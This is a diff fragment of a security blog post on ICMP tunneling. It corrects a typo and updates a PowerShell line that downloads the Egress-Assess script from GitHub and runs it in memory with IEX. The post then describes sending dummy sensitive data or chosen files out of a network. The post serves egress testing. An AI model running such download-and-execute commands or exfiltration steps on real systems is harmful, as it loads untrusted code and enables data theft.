sp00ks-git/sp00ks-git.github.io/_posts/2021-10-10-ICMP-Tunneling.md

 ![img-description](/images/icmp-4.JPG)
 _ICMP Server Started & waiting for connections_

-Next you can either download the file onto the client, or run it in memeory directly.
+Next you can either download the file onto the client, or run it in memory directly.

 ```
-IEX (New-Object Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/ChrisTruncer/Egress-Assess/master/Invoke-EgressAssess.ps1‘)
+IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/FortyNorthSecurity/Egress-Assess/master/EgressAssess.ps1')
 ```

 Next, you have two main options.
 You either user the built-in audit tools that will create dummy data to mimic sensitive information such as Social Security Numbers / Credit Cards, OR you can specify specfic custom files.